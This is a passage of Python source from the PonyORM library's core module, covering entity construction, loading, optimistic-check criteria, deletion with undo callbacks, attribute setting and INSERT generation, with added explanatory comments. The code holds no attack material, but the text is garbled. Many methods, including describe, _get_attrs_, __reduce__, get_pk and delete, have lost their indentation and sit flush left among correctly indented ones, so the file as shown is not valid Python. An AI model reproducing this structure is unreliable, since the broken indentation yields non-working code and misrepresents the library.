                val = attr.py_type._get_by_raw_pkval_(vals, from_db=from_db)
                i += len(attr.columns)
            pkval.append(val)
        if not entity._pk_is_composite_: pkval = pkval[0]
        else: pkval = tuple(pkval)
        obj = entity._get_from_identity_map_(pkval, 'loaded', for_update)
        assert obj._status_ != 'cancelled'
        return obj
    def _get_propagation_mixin_(entity):
        # Build (once) a mixin class that adds one property per entity attribute,
        # used by set wrappers / multisets so that e.g. `group.students.name`
        # propagates the attribute over every element and returns a Multiset.
        mixin = entity._propagation_mixin_
        if mixin is not None: return mixin
        cls_dict = { '_entity_' : entity }
        for attr in entity._attrs_:
            # NOTE: `attr=attr` default argument binds the current attr in each
            # closure (avoiding the late-binding pitfall in loops)
            if not attr.reverse:
                # plain attribute -> Multiset of values (Json values untracked)
                def fget(wrapper, attr=attr):
                    attrnames = wrapper._attrnames_ + (attr.name,)
                    items = [ x for x in (attr.__get__(item) for item in wrapper) if x is not None ]
                    if attr.py_type is Json:
                        return [ item.get_untracked() if isinstance(item, TrackedValue) else item for item in items ]
                    return Multiset(wrapper._obj_, attrnames, items)
            elif not attr.is_collection:
                # to-one relationship -> entity-specific multiset of related objects
                def fget(wrapper, attr=attr):
                    attrnames = wrapper._attrnames_ + (attr.name,)
                    items = [ x for x in (attr.__get__(item) for item in wrapper) if x is not None ]
                    rentity = attr.py_type
                    cls = rentity._get_multiset_subclass_()
                    return cls(wrapper._obj_, attrnames, items)
            else:
                # to-many relationship -> flattened multiset of all related objects
                def fget(wrapper, attr=attr):
                    cache = attr.entity._database_._get_cache()
                    cache.collection_statistics.setdefault(attr, attr.nplus1_threshold)
                    attrnames = wrapper._attrnames_ + (attr.name,)
                    items = [ subitem for item in wrapper
                                      for subitem in attr.__get__(item) ]
                    rentity = attr.py_type
                    cls = rentity._get_multiset_subclass_()
                    return cls(wrapper._obj_, attrnames, items)
            cls_dict[attr.name] = property(fget)
        result_cls_name = entity.__name__ + 'SetMixin'
        result_cls = type(result_cls_name, (object,), cls_dict)
        entity._propagation_mixin_ = result_cls
        return result_cls
def _get_multiset_subclass_(entity):
result_cls = entity._multiset_subclass_
if result_cls is None:
mixin = entity._get_propagation_mixin_()
cls_name = entity.__name__ + 'Multiset'
result_cls = type(cls_name, (Multiset, mixin), {})
entity._multiset_subclass_ = result_cls
return result_cls
def _get_set_wrapper_subclass_(entity):
result_cls = entity._set_wrapper_subclass_
if result_cls is None:
mixin = entity._get_propagation_mixin_()
cls_name = entity.__name__ + 'Set'
result_cls = type(cls_name, (SetInstance, mixin), {})
entity._set_wrapper_subclass_ = result_cls
return result_cls
@cut_traceback
def describe(entity):
result = []
parents = ','.join(cls.__name__ for cls in entity.__bases__)
result.append('class %s(%s):' % (entity.__name__, parents))
if entity._base_attrs_:
result.append('# inherited attrs')
result.extend(attr.describe() for attr in entity._base_attrs_)
result.append('# attrs introduced in %s' % entity.__name__)
result.extend(attr.describe() for attr in entity._new_attrs_)
if entity._pk_is_composite_:
result.append('PrimaryKey(%s)' % ', '.join(attr.name for attr in entity._pk_attrs_))
return '\n '.join(result)
    @cut_traceback
    @db_session(ddl=True)
    def drop_table(entity, with_all_data=False):
        # DDL helper: drop only this entity's table via the owning database.
        # NOTE(review): the second positional argument (True) — presumably an
        # "if exists"-style flag for _drop_tables — confirm against its definition.
        entity._database_._drop_tables([ entity._table_ ], True, with_all_data)
def _get_attrs_(entity, only=None, exclude=None, with_collections=False, with_lazy=False):
if only and not isinstance(only, basestring): only = tuple(only)
if exclude and not isinstance(exclude, basestring): exclude = tuple(exclude)
key = (only, exclude, with_collections, with_lazy)
attrs = entity._attrnames_cache_.get(key)
if not attrs:
attrs = []
append = attrs.append
if only:
if isinstance(only, basestring): only = only.replace(',', ' ').split()
get_attr = entity._adict_.get
for attrname in only:
attr = get_attr(attrname)
if attr is None: throw(AttributeError,
'Entity %s does not have attriute %s' % (entity.__name__, attrname))
else: append(attr)
else:
for attr in entity._attrs_:
if attr.is_collection:
if with_collections: append(attr)
elif attr.lazy:
if with_lazy: append(attr)
else: append(attr)
if exclude:
if isinstance(exclude, basestring): exclude = exclude.replace(',', ' ').split()
for attrname in exclude:
if attrname not in entity._adict_: throw(AttributeError,
'Entity %s does not have attriute %s' % (entity.__name__, attrname))
attrs = (attr for attr in attrs if attr.name not in exclude)
attrs = tuple(attrs)
entity._attrnames_cache_[key] = attrs
return attrs
def populate_criteria_list(criteria_list, columns, converters, operations,
                           params_count=0, table_alias=None, optimistic=False):
    # Append one WHERE-criterion AST node per column.  A numbered PARAM node
    # is emitted for every operation except IS_NULL.  Returns the next free
    # parameter index so calls can be chained.
    for column, op, converter in zip(columns, operations, converters):
        if op == 'IS_NULL':
            # NOTE: table_alias is deliberately(?) not used for IS NULL nodes.
            criteria_list.append([ op, [ 'COLUMN', None, column ] ])
            continue
        param_node = [ 'PARAM', (params_count, None, None), converter, optimistic ]
        criteria_list.append([ op, [ 'COLUMN', table_alias, column ], param_node ])
        params_count += 1
    return params_count
# Lifecycle states an entity instance can be in within a db_session.
statuses = {'created', 'cancelled', 'loaded', 'modified', 'inserted', 'updated', 'marked_to_delete', 'deleted'}
# States in which the object must be treated as deleted / unusable.
del_statuses = {'marked_to_delete', 'deleted', 'cancelled'}
created_or_deleted_statuses = {'created'} | del_statuses
# States reached only after the pending change has been flushed to the DB.
saved_statuses = {'inserted', 'updated', 'deleted'}
def throw_object_was_deleted(obj):
    # Raise the canonical error for any operation on a deleted/cancelled object.
    status = obj._status_
    assert status in del_statuses
    message = '%s was %s' % (safe_repr(obj), status.replace('_', ' '))
    throw(OperationWithDeletedObjectError, message)
def unpickle_entity(d):
    # Reconstruct a pickled entity inside the *current* db_session: look the
    # object up in the identity map by PK, then merge the remaining attribute
    # values as if they had just been loaded from the database.
    entity = d.pop('__class__')
    cache = entity._database_._get_cache()
    if not entity._pk_is_composite_: pkval = d.get(entity._pk_attrs_[0].name)
    else: pkval = tuple(d[attr.name] for attr in entity._pk_attrs_)
    assert pkval is not None
    obj = entity._get_from_identity_map_(pkval, 'loaded')
    # If the object was deleted in this session, keep that state.
    if obj._status_ in del_statuses: return obj
    avdict = {}
    for attrname, val in iteritems(d):
        attr = entity._adict_[attrname]
        if attr.pk_offset is not None: continue  # PK already applied above
        avdict[attr] = val
    obj._db_set_(avdict, unpickling=True)
    return obj
def safe_repr(obj):
    # Use the base Entity.__repr__ directly, bypassing any subclass override,
    # so building an error message can never itself fail or trigger loading.
    return Entity.__repr__(obj)
class Entity(with_metaclass(EntityMeta)):
    # Base class for all persistent entities.  __slots__ keeps instances
    # small: values live in _vals_ (current) and _dbvals_ (as loaded from DB);
    # _rbits_/_wbits_ are per-attribute read/write bitmasks used for
    # optimistic checks; _save_pos_ is the object's slot in the session
    # cache's objects_to_save list.
    __slots__ = '_session_cache_', '_status_', '_pkval_', '_newid_', '_dbvals_', '_vals_', '_rbits_', '_wbits_', '_save_pos_', '__weakref__'
def __reduce__(obj):
if obj._status_ in del_statuses: throw(
OperationWithDeletedObjectError, 'Deleted object %s cannot be pickled' % safe_repr(obj))
if obj._status_ in ('created', 'modified'): throw(
OrmError, '%s object %s has to be stored in DB before it can be pickled'
% (obj._status_.capitalize(), safe_repr(obj)))
d = {'__class__' : obj.__class__}
adict = obj._adict_
for attr, val in iteritems(obj._vals_):
if not attr.is_collection: d[attr.name] = val
return unpickle_entity, (d,)
    @cut_traceback
    def __init__(obj, *args, **kwargs):
        # Create a new instance in the 'created' state: validate every
        # attribute value, check unique/composite keys against the session
        # cache, wire reverse relations, and schedule the object for INSERT.
        obj._status_ = None
        entity = obj.__class__
        if args: raise TypeError('%s constructor accept only keyword arguments. Got: %d positional argument%s'
                                 % (entity.__name__, len(args), len(args) > 1 and 's' or ''))
        if entity._database_.schema is None:
            throw(ERDiagramError, 'Mapping is not generated for entity %r' % entity.__name__)
        avdict = {}
        for name in kwargs:
            if name not in entity._adict_: throw(TypeError, 'Unknown attribute %r' % name)
        for attr in entity._attrs_:
            val = kwargs.get(attr.name, DEFAULT)
            avdict[attr] = attr.validate(val, obj, entity, from_db=False)
        if entity._pk_is_composite_:
            pkval = tuple(imap(avdict.get, entity._pk_attrs_))
            if None in pkval: pkval = None  # incomplete composite PK -> auto/unknown
        else: pkval = avdict.get(entity._pk_attrs_[0])
        undo_funcs = []
        cache = entity._database_._get_cache()
        cache_indexes = cache.indexes
        indexes_update = {}
        # Flushing is disabled while indexes and reverse relations are set up,
        # so a partially-initialized object can never be saved mid-way.
        with cache.flush_disabled():
            for attr in entity._simple_keys_:
                val = avdict[attr]
                if val is None: continue
                if val in cache_indexes[attr]: throw(CacheIndexError,
                    'Cannot create %s: value %r for key %s already exists' % (entity.__name__, val, attr.name))
                indexes_update[attr] = val
            for attrs in entity._composite_keys_:
                vals = tuple(avdict[attr] for attr in attrs)
                if None in vals: continue
                if vals in cache_indexes[attrs]:
                    attr_names = ', '.join(attr.name for attr in attrs)
                    throw(CacheIndexError, 'Cannot create %s: value %s for composite key (%s) already exists'
                                           % (entity.__name__, vals, attr_names))
                indexes_update[attrs] = vals
            try:
                entity._get_from_identity_map_(pkval, 'created', undo_funcs=undo_funcs, obj_to_init=obj)
                for attr, val in iteritems(avdict):
                    if attr.pk_offset is not None: continue
                    elif not attr.is_collection:
                        obj._vals_[attr] = val
                        if attr.reverse: attr.update_reverse(obj, None, val, undo_funcs)
                    else: attr.__set__(obj, val, undo_funcs)
            except:
                # Roll back reverse-relation updates in reverse order.
                for undo_func in reversed(undo_funcs): undo_func()
                raise
            if pkval is not None: cache_indexes[entity._pk_attrs_][pkval] = obj
            for key, vals in iteritems(indexes_update): cache_indexes[key][vals] = obj
        objects_to_save = cache.objects_to_save
        obj._save_pos_ = len(objects_to_save)
        objects_to_save.append(obj)
        cache.modified = True
def get_pk(obj):
pkval = obj._get_raw_pkval_()
if len(pkval) == 1: return pkval[0]
return pkval
def _get_raw_pkval_(obj):
pkval = obj._pkval_
if not obj._pk_is_composite_:
if not obj._pk_attrs_[0].reverse: return (pkval,)
else: return pkval._get_raw_pkval_()
raw_pkval = []
append, extend = raw_pkval.append, raw_pkval.extend
for attr, val in izip(obj._pk_attrs_, pkval):
if not attr.reverse: append(val)
else: extend(val._get_raw_pkval_())
return tuple(raw_pkval)
@cut_traceback
def __lt__(entity, other):
return entity._cmp_(other) < 0
@cut_traceback
def __le__(entity, other):
return entity._cmp_(other) <= 0
@cut_traceback
def __gt__(entity, other):
return entity._cmp_(other) > 0
@cut_traceback
def __ge__(entity, other):
return entity._cmp_(other) >= 0
def _cmp_(entity, other):
if entity is other: return 0
if isinstance(other, Entity):
pkval = entity._pkval_
other_pkval = other._pkval_
if pkval is not None:
if other_pkval is None: return -1
result = cmp(pkval, other_pkval)
else:
if other_pkval is not None: return 1
result = cmp(entity._newid_, other._newid_)
if result: return result
return cmp(id(entity), id(other))
@cut_traceback
def __repr__(obj):
pkval = obj._pkval_
if pkval is None: return '%s[new:%d]' % (obj.__class__.__name__, obj._newid_)
if obj._pk_is_composite_: pkval = ','.join(imap(repr, pkval))
else: pkval = repr(pkval)
return '%s[%s]' % (obj.__class__.__name__, pkval)
    def _load_(obj):
        # (Re)load this object's row from the database.  With PREFETCHING on,
        # other "seed" objects of the same entity are piggybacked onto the
        # same batched SELECT to avoid N+1 queries.
        cache = obj._session_cache_
        if cache is None or not cache.is_alive: throw_db_session_is_over('load object', obj)
        entity = obj.__class__
        database = entity._database_
        if cache is not database._get_cache():
            throw(TransactionError, "Object %s doesn't belong to current transaction" % safe_repr(obj))
        seeds = cache.seeds[entity._pk_attrs_]
        # Batch size is capped by the provider's maximum SQL parameter count.
        max_batch_size = database.provider.max_params_count // len(entity._pk_columns_)
        objects = [ obj ]
        if options.PREFETCHING:
            for seed in seeds:
                if len(objects) >= max_batch_size: break
                if seed is not obj: objects.append(seed)
        sql, adapter, attr_offsets = entity._construct_batchload_sql_(len(objects))
        arguments = adapter(objects)
        cursor = database._exec_sql(sql, arguments)
        objects = entity._fetch_objects(cursor, attr_offsets)
        # The row must still exist; otherwise the read is not repeatable.
        if obj not in objects: throw(UnrepeatableReadError,
            'Phantom object %s disappeared' % safe_repr(obj))
    @cut_traceback
    def load(obj, *attrs):
        # Eagerly load the given attributes (names or Attribute objects) of
        # this object with a single SELECT; with no arguments, load every
        # not-yet-loaded trackable attribute.  Collection attributes are not
        # supported.  The generated SQL is cached per attribute combination.
        cache = obj._session_cache_
        if cache is None or not cache.is_alive: throw_db_session_is_over('load object', obj)
        entity = obj.__class__
        database = entity._database_
        if cache is not database._get_cache():
            throw(TransactionError, "Object %s doesn't belong to current transaction" % safe_repr(obj))
        if obj._status_ in created_or_deleted_statuses: return
        if not attrs:
            attrs = tuple(attr for attr, bit in iteritems(entity._bits_)
                          if bit and attr not in obj._vals_)
        else:
            # Normalize the arguments into a sorted tuple of Attribute objects.
            args = attrs
            attrs = set()
            for arg in args:
                if isinstance(arg, basestring):
                    attr = entity._adict_.get(arg)
                    if attr is None:
                        if not is_ident(arg): throw(ValueError, 'Invalid attribute name: %r' % arg)
                        throw(AttributeError, 'Object %s does not have attribute %r' % (obj, arg))
                elif isinstance(arg, Attribute):
                    attr = arg
                    if not isinstance(obj, attr.entity): throw(AttributeError,
                        'Attribute %s does not belong to object %s' % (attr, obj))
                else: throw(TypeError, 'Invalid argument type: %r' % arg)
                if attr.is_collection: throw(NotImplementedError,
                    'The load() method does not support collection attributes yet. Got: %s' % attr.name)
                if entity._bits_[attr] and attr not in obj._vals_: attrs.add(attr)
            attrs = tuple(sorted(attrs, key=attrgetter('id')))
        sql_cache = entity._root_._load_sql_cache_
        cached_sql = sql_cache.get(attrs)
        if cached_sql is None:
            # Build SELECT <pk+discriminator+attrs> FROM <table> WHERE <pk=params>.
            if entity._discriminator_attr_ is not None:
                attrs = (entity._discriminator_attr_,) + attrs
            attrs = entity._pk_attrs_ + attrs
            attr_offsets = {}
            select_list = [ 'ALL' ]
            for attr in attrs:
                attr_offsets[attr] = offsets = []
                for column in attr.columns:
                    offsets.append(len(select_list) - 1)
                    select_list.append([ 'COLUMN', None, column ])
            from_list = [ 'FROM', [ None, 'TABLE', entity._table_ ]]
            criteria_list = [ [ converter.EQ, [ 'COLUMN', None, column ], [ 'PARAM', (i, None, None), converter ] ]
                              for i, (column, converter) in enumerate(izip(obj._pk_columns_, obj._pk_converters_)) ]
            where_list = [ 'WHERE' ] + criteria_list
            sql_ast = [ 'SELECT', select_list, from_list, where_list ]
            sql, adapter = database._ast2sql(sql_ast)
            cached_sql = sql, adapter, attr_offsets
            sql_cache[attrs] = cached_sql
        else: sql, adapter, attr_offsets = cached_sql
        arguments = adapter(obj._get_raw_pkval_())
        cursor = database._exec_sql(sql, arguments)
        objects = entity._fetch_objects(cursor, attr_offsets)
        if obj not in objects: throw(UnrepeatableReadError,
            'Phantom object %s disappeared' % safe_repr(obj))
    def _attr_changed_(obj, attr):
        # Record that `attr` was assigned: set its write bit and move the
        # object into 'modified', scheduling it for UPDATE on flush.
        cache = obj._session_cache_
        if cache is None or not cache.is_alive: throw_db_session_is_over('assign new value to', obj, attr)
        if obj._status_ in del_statuses: throw_object_was_deleted(obj)
        status = obj._status_
        wbits = obj._wbits_
        bit = obj._bits_[attr]
        objects_to_save = cache.objects_to_save
        # wbits is None for not-yet-inserted ('created') objects; bit is 0
        # for attributes that are not change-tracked.
        if wbits is not None and bit:
            obj._wbits_ |= bit
            if status != 'modified':
                assert status in ('loaded', 'inserted', 'updated')
                assert obj._save_pos_ is None
                obj._status_ = 'modified'
                obj._save_pos_ = len(objects_to_save)
                objects_to_save.append(obj)
                cache.modified = True
    def _db_set_(obj, avdict, unpickling=False):
        # Merge freshly loaded database values into the object.  Detects
        # unrepeatable reads: if an attribute whose read bit is set has
        # changed in the database, the transaction cannot proceed.  Locally
        # written values (write bit set) win over incoming database values.
        assert obj._status_ not in created_or_deleted_statuses
        cache = obj._session_cache_
        assert cache is not None and cache.is_alive
        cache.seeds[obj._pk_attrs_].discard(obj)  # the object is a seed no more
        if not avdict: return
        get_val = obj._vals_.get
        get_dbval = obj._dbvals_.get
        rbits = obj._rbits_
        wbits = obj._wbits_
        for attr, new_dbval in items_list(avdict):
            assert attr.pk_offset is None
            assert new_dbval is not NOT_LOADED
            old_dbval = get_dbval(attr, NOT_LOADED)
            if old_dbval is not NOT_LOADED:
                if unpickling or old_dbval == new_dbval or (
                        not attr.reverse and attr.converters[0].dbvals_equal(old_dbval, new_dbval)):
                    # Unchanged in the database: nothing to merge for this attr.
                    del avdict[attr]
                    continue
                bit = obj._bits_except_volatile_[attr]
                if rbits & bit:
                    # The application already read the old value -> conflict.
                    errormsg = 'Please contact PonyORM developers so they can ' \
                               'reproduce your error and fix a bug: support@ponyorm.com'
                    assert old_dbval is not NOT_LOADED, errormsg
                    throw(UnrepeatableReadError,
                        'Value of %s.%s for %s was updated outside of current transaction (was: %r, now: %r)'
                        % (obj.__class__.__name__, attr.name, obj, old_dbval, new_dbval))
            if attr.reverse: attr.db_update_reverse(obj, old_dbval, new_dbval)
            obj._dbvals_[attr] = new_dbval
            if wbits & bit: del avdict[attr]  # local write takes precedence
            if attr.is_unique:
                old_val = get_val(attr)
                if old_val != new_dbval:
                    cache.db_update_simple_index(obj, attr, old_val, new_dbval)
        for attrs in obj._composite_keys_:
            if any(attr in avdict for attr in attrs):
                vals = [ get_val(a) for a in attrs ] # In Python 2 var name leaks into the function scope!
                prev_vals = tuple(vals)
                for i, attr in enumerate(attrs):
                    if attr in avdict: vals[i] = avdict[attr]
                new_vals = tuple(vals)
                cache.db_update_composite_index(obj, attrs, prev_vals, new_vals)
        for attr, new_val in iteritems(avdict):
            if not attr.reverse:
                assert len(attr.converters) == 1, attr
                converter = attr.converters[0]
                new_val = converter.dbval2val(new_val, obj)
            obj._vals_[attr] = new_val
    def _delete_(obj, undo_funcs=None):
        # Mark the object for deletion (or cancel it if never inserted).
        # Handles cascade deletes, clears/validates reverse relations, and
        # removes the object from all cache indexes.  All mutations register
        # undo callbacks so the whole (possibly recursive) operation can be
        # rolled back on error.
        status = obj._status_
        if status in del_statuses: return  # already deleted / cancelled
        is_recursive_call = undo_funcs is not None
        if not is_recursive_call: undo_funcs = []
        cache = obj._session_cache_
        assert cache is not None and cache.is_alive
        with cache.flush_disabled():
            get_val = obj._vals_.get
            undo_list = []
            objects_to_save = cache.objects_to_save
            save_pos = obj._save_pos_
            def undo_func():
                # Restore the pre-delete status, save-queue slot and indexes.
                if obj._status_ == 'marked_to_delete':
                    assert objects_to_save
                    obj2 = objects_to_save.pop()
                    assert obj2 is obj
                    if save_pos is not None:
                        assert objects_to_save[save_pos] is None
                        objects_to_save[save_pos] = obj
                    obj._save_pos_ = save_pos
                obj._status_ = status
                for cache_index, old_key in undo_list: cache_index[old_key] = obj
            undo_funcs.append(undo_func)
            try:
                # Pass 1: handle owned collections (cascade or clear).
                for attr in obj._attrs_:
                    if not attr.is_collection: continue
                    if isinstance(attr, Set):
                        set_wrapper = attr.__get__(obj)
                        if not set_wrapper.__nonzero__(): pass
                        elif attr.cascade_delete:
                            for robj in set_wrapper: robj._delete_(undo_funcs)
                        elif not attr.reverse.is_required: attr.__set__(obj, (), undo_funcs)
                        else: throw(ConstraintError, "Cannot delete object %s, because it has non-empty set of %s, "
                                                     "and 'cascade_delete' option of %s is not set"
                                                     % (obj, attr.name, attr))
                    else: throw(NotImplementedError)
                # Pass 2: detach this object from reverse sides of relations.
                for attr in obj._attrs_:
                    if not attr.is_collection:
                        reverse = attr.reverse
                        if not reverse: continue
                        if not reverse.is_collection:
                            val = get_val(attr) if attr in obj._vals_ else attr.load(obj)
                            if val is None: continue
                            if attr.cascade_delete: val._delete_(undo_funcs)
                            elif not reverse.is_required: reverse.__set__(val, None, undo_funcs)
                            else: throw(ConstraintError, "Cannot delete object %s, because it has associated %s, "
                                                         "and 'cascade_delete' option of %s is not set"
                                                         % (obj, attr.name, attr))
                        elif isinstance(reverse, Set):
                            if attr not in obj._vals_: continue
                            val = get_val(attr)
                            if val is None: continue
                            reverse.reverse_remove((val,), obj, undo_funcs)
                        else: throw(NotImplementedError)
                # Pass 3: drop the object from unique-key cache indexes.
                cache_indexes = cache.indexes
                for attr in obj._simple_keys_:
                    val = get_val(attr)
                    if val is None: continue
                    cache_index = cache_indexes[attr]
                    obj2 = cache_index.pop(val)
                    assert obj2 is obj
                    undo_list.append((cache_index, val))
                for attrs in obj._composite_keys_:
                    vals = tuple(get_val(attr) for attr in attrs)
                    if None in vals: continue
                    cache_index = cache_indexes[attrs]
                    obj2 = cache_index.pop(vals)
                    assert obj2 is obj
                    undo_list.append((cache_index, vals))
                if status == 'created':
                    # Never inserted: cancel instead of scheduling a DELETE.
                    assert save_pos is not None
                    objects_to_save[save_pos] = None
                    obj._save_pos_ = None
                    obj._status_ = 'cancelled'
                    if obj._pkval_ is not None:
                        pk_index = cache_indexes[obj._pk_attrs_]
                        obj2 = pk_index.pop(obj._pkval_)
                        assert obj2 is obj
                        undo_list.append((pk_index, obj._pkval_))
                else:
                    if status == 'modified':
                        assert save_pos is not None
                        objects_to_save[save_pos] = None
                    else:
                        assert status in ('loaded', 'inserted', 'updated')
                        assert save_pos is None
                    obj._save_pos_ = len(objects_to_save)
                    objects_to_save.append(obj)
                    obj._status_ = 'marked_to_delete'
                    cache.modified = True
            except:
                # Only the outermost call unwinds the undo stack.
                if not is_recursive_call:
                    for undo_func in reversed(undo_funcs): undo_func()
                raise
@cut_traceback
def delete(obj):
cache = obj._session_cache_
if cache is None or not cache.is_alive: throw_db_session_is_over('delete object', obj)
obj._delete_()
    @cut_traceback
    def set(obj, **kwargs):
        # Bulk-assign attribute values.  Validates the kwargs, sets write
        # bits, updates unique/composite cache indexes and reverse relations,
        # rolling everything back via undo callbacks if any step fails.
        cache = obj._session_cache_
        if cache is None or not cache.is_alive: throw_db_session_is_over('change object', obj)
        if obj._status_ in del_statuses: throw_object_was_deleted(obj)
        with cache.flush_disabled():
            avdict, collection_avdict = obj._keyargs_to_avdicts_(kwargs)
            status = obj._status_
            wbits = obj._wbits_
            get_val = obj._vals_.get
            objects_to_save = cache.objects_to_save
            if avdict:
                for attr in avdict:
                    if attr not in obj._vals_ and attr.reverse and not attr.reverse.is_collection:
                        attr.load(obj) # loading of one-to-one relations
                if wbits is not None:
                    new_wbits = wbits
                    for attr in avdict: new_wbits |= obj._bits_[attr]
                    obj._wbits_ = new_wbits
                    if status != 'modified':
                        assert status in ('loaded', 'inserted', 'updated')
                        assert obj._save_pos_ is None
                        obj._status_ = 'modified'
                        obj._save_pos_ = len(objects_to_save)
                        objects_to_save.append(obj)
                        cache.modified = True
                if not collection_avdict:
                    # Fast path: no index or relation maintenance required.
                    if not any(attr.reverse or attr.is_part_of_unique_index for attr in avdict):
                        obj._vals_.update(avdict)
                        return
            # Drop no-op assignments so indexes are not touched needlessly.
            for attr, value in items_list(avdict):
                if value == get_val(attr):
                    avdict.pop(attr)
            undo_funcs = []
            undo = []
            def undo_func():
                # Restore status, write bits, save-queue slot and index keys.
                obj._status_ = status
                obj._wbits_ = wbits
                if status in ('loaded', 'inserted', 'updated'):
                    assert objects_to_save
                    obj2 = objects_to_save.pop()
                    assert obj2 is obj and obj._save_pos_ == len(objects_to_save)
                    obj._save_pos_ = None
                for cache_index, old_key, new_key in undo:
                    if new_key is not None: del cache_index[new_key]
                    if old_key is not None: cache_index[old_key] = obj
            try:
                for attr in obj._simple_keys_:
                    if attr not in avdict: continue
                    new_val = avdict[attr]
                    old_val = get_val(attr)
                    cache.update_simple_index(obj, attr, old_val, new_val, undo)
                for attrs in obj._composite_keys_:
                    if any(attr in avdict for attr in attrs):
                        vals = [ get_val(a) for a in attrs ] # In Python 2 var name leaks into the function scope!
                        prev_vals = tuple(vals)
                        for i, attr in enumerate(attrs):
                            if attr in avdict: vals[i] = avdict[attr]
                        new_vals = tuple(vals)
                        cache.update_composite_index(obj, attrs, prev_vals, new_vals, undo)
                for attr, new_val in iteritems(avdict):
                    if not attr.reverse: continue
                    old_val = get_val(attr)
                    attr.update_reverse(obj, old_val, new_val, undo_funcs)
                for attr, new_val in iteritems(collection_avdict):
                    attr.__set__(obj, new_val, undo_funcs)
            except:
                for undo_func in undo_funcs: undo_func()
                raise
        obj._vals_.update(avdict)
def _keyargs_to_avdicts_(obj, kwargs):
avdict, collection_avdict = {}, {}
get_attr = obj._adict_.get
for name, new_val in kwargs.items():
attr = get_attr(name)
if attr is None: throw(TypeError, 'Unknown attribute %r' % name)
new_val = attr.validate(new_val, obj, from_db=False)
if attr.is_collection: collection_avdict[attr] = new_val
elif attr.pk_offset is None: avdict[attr] = new_val
elif obj._vals_.get(attr, new_val) != new_val:
throw(TypeError, 'Cannot change value of primary key attribute %s' % attr.name)
return avdict, collection_avdict
@classmethod
def _attrs_with_bit_(entity, attrs, mask=-1):
get_bit = entity._bits_.get
for attr in attrs:
if get_bit(attr) & mask: yield attr
    def _construct_optimistic_criteria_(obj):
        # Build parallel lists (operations, columns, converters, values) for
        # the optimistic WHERE clause, taken from attributes that were read
        # (_rbits_) during this transaction and are marked optimistic.
        optimistic_columns = []
        optimistic_converters = []
        optimistic_values = []
        optimistic_operations = []
        for attr in obj._attrs_with_bit_(obj._attrs_with_columns_, obj._rbits_):
            converters = attr.converters
            assert converters
            # Attribute-level setting overrides the converter default.
            optimistic = attr.optimistic if attr.optimistic is not None else converters[0].optimistic
            if not optimistic: continue
            dbval = obj._dbvals_[attr]
            optimistic_columns.extend(attr.columns)
            optimistic_converters.extend(attr.converters)
            values = attr.get_raw_values(dbval)
            optimistic_values.extend(values)
            # NULLs must be compared with IS NULL rather than equality.
            optimistic_operations.extend('IS_NULL' if dbval is None else converter.EQ for converter in converters)
        return optimistic_operations, optimistic_columns, optimistic_converters, optimistic_values
    def _save_principal_objects_(obj, dependent_objects):
        # Recursively save still-'created' objects that this object references
        # so their PKs exist before this object's row is written; detect
        # unresolvable cycles of new objects along the way.
        if dependent_objects is None: dependent_objects = []
        elif obj in dependent_objects:
            chain = ' -> '.join(obj2.__class__.__name__ for obj2 in dependent_objects)
            throw(UnresolvableCyclicDependency, 'Cannot save cyclic chain: ' + chain)
        dependent_objects.append(obj)
        status = obj._status_
        if status == 'created': attrs = obj._attrs_with_columns_
        elif status == 'modified': attrs = obj._attrs_with_bit_(obj._attrs_with_columns_, obj._wbits_)
        else: assert False # pragma: no cover
        for attr in attrs:
            if not attr.reverse: continue
            val = obj._vals_[attr]
            if val is not None and val._status_ == 'created':
                val._save_(dependent_objects)
    def _update_dbvals_(obj, after_create, new_dbvals):
        # Synchronize _dbvals_ with what was just written.  Volatile
        # attributes (and NULLs right after INSERT) are evicted from _vals_,
        # _dbvals_ and the cache indexes because the database may have
        # changed them (e.g. via defaults or triggers).
        bits = obj._bits_
        vals = obj._vals_
        dbvals = obj._dbvals_
        cache_indexes = obj._session_cache_.indexes
        for attr in obj._attrs_with_columns_:
            if not bits.get(attr): continue
            if attr not in vals: continue
            val = vals[attr]
            if attr.is_volatile:
                if val is not None:
                    if attr.is_unique: cache_indexes[attr].pop(val, None)
                    get_val = vals.get
                    for key, i in attr.composite_keys:
                        keyval = tuple(get_val(attr) for attr in key)
                        cache_indexes[key].pop(keyval, None)
            elif after_create and val is None:
                # NULL written on INSERT: forget the read bit so the real
                # (possibly DB-generated) value gets re-read later.
                obj._rbits_ &= ~bits[attr]
            else:
                if attr in new_dbvals:
                    dbvals[attr] = new_dbvals[attr]
                continue
            # Clear value of volatile attribute or null values after create, because the value may be changed in the DB
            del vals[attr]
            dbvals.pop(attr, None)
    def _save_created_(obj):
        # Flush a 'created' object: build (or reuse cached) INSERT SQL for the
        # set of non-NULL attributes, execute it, retrieve an auto-generated
        # PK if needed, and transition the object to 'inserted'.
        auto_pk = (obj._pkval_ is None)
        attrs = []
        values = []
        new_dbvals = {}
        for attr in obj._attrs_with_columns_:
            if auto_pk and attr.is_pk: continue  # DB will generate the PK
            val = obj._vals_[attr]
            if val is not None:
                attrs.append(attr)
                if not attr.reverse:
                    assert len(attr.converters) == 1
                    dbval = attr.converters[0].val2dbval(val, obj)
                    new_dbvals[attr] = dbval
                    values.append(dbval)
                else:
                    new_dbvals[attr] = val
                    values.extend(attr.get_raw_values(val))
        attrs = tuple(attrs)
        database = obj._database_
        # INSERT SQL is cached per combination of assigned attributes.
        cached_sql = obj._insert_sql_cache_.get(attrs)
        if cached_sql is None:
            columns = []
            converters = []
            for attr in attrs:
                columns.extend(attr.columns)
                converters.extend(attr.converters)
            assert len(columns) == len(converters)
            params = [ [ 'PARAM', (i, None, None), converter ] for i, converter in enumerate(converters) ]
            entity = obj.__class__
            if not columns and database.provider.dialect == 'Oracle':
                # Oracle cannot INSERT with an empty column list.
                sql_ast = [ 'INSERT', entity._table_, obj._pk_columns_,
                            [ [ 'DEFAULT' ] for column in obj._pk_columns_ ] ]
            else: sql_ast = [ 'INSERT', entity._table_, columns, params ]
            if auto_pk: sql_ast.append(entity._pk_columns_[0])
            sql, adapter = database._ast2sql(sql_ast)
            entity._insert_sql_cache_[attrs] = sql, adapter
        else: sql, adapter = cached_sql
        arguments = adapter(values)
        try:
            if auto_pk: new_id = database._exec_sql(sql, arguments, returning_id=True,
                                                    start_transaction=True)
            else: database._exec_sql(sql, arguments, start_transaction=True)
        except IntegrityError as e:
            msg = " ".join(tostring(arg) for arg in e.args)
            throw(TransactionIntegrityError,
                  'Object %r cannot be stored in the database. %s: %s'
                  % (obj, e.__class__.__name__, msg), e)
        except DatabaseError as e:
            msg = " ".join(tostring(arg) for arg in e.args)
            throw(UnexpectedError, 'Object %r cannot be stored in the database. %s: %s'
                                   % (obj, e.__class__.__name__, msg), e)
